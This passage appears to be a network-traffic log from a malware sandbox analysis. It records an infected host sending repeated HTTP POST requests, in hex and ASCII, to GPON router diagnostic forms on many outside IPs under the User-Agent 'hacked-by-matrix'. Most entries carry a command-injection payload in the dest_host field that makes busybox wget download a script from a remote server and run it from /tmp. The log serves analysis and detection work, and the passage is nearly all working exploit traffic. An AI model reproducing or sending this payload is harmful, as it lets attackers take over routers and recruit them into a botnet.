                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2103192.168.2.1354346118.86.202.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885751009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2104192.168.2.135237442.141.51.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885765076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2105192.168.2.13418425.165.157.184443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885778904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2106192.168.2.1357992109.119.20.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885785103 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2107192.168.2.1339374109.233.4.167443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885818958 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2108192.168.2.133437842.65.166.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885858059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2109192.168.2.13491045.64.82.96443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885898113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2110192.168.2.13445505.227.102.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885931015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2111192.168.2.1342764212.110.237.185443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885931015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2112192.168.2.1350900118.184.208.51443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885972023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2113192.168.2.1350916109.200.155.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885987043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2114192.168.2.1354288118.206.249.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886008978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2115192.168.2.13524085.39.242.239443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886035919 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2116192.168.2.13506425.144.74.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886035919 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2117192.168.2.13587785.216.91.58443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886065006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2118192.168.2.13410285.242.143.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886087894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2119192.168.2.1336914109.0.93.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886102915 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2120192.168.2.1346340118.68.151.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886132002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2121192.168.2.1338146118.54.233.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886163950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2122192.168.2.1349708212.58.2.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886190891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2123192.168.2.1356618109.68.130.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886204004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2124192.168.2.13431905.43.215.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886224985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2125192.168.2.1334634212.169.222.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886229992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
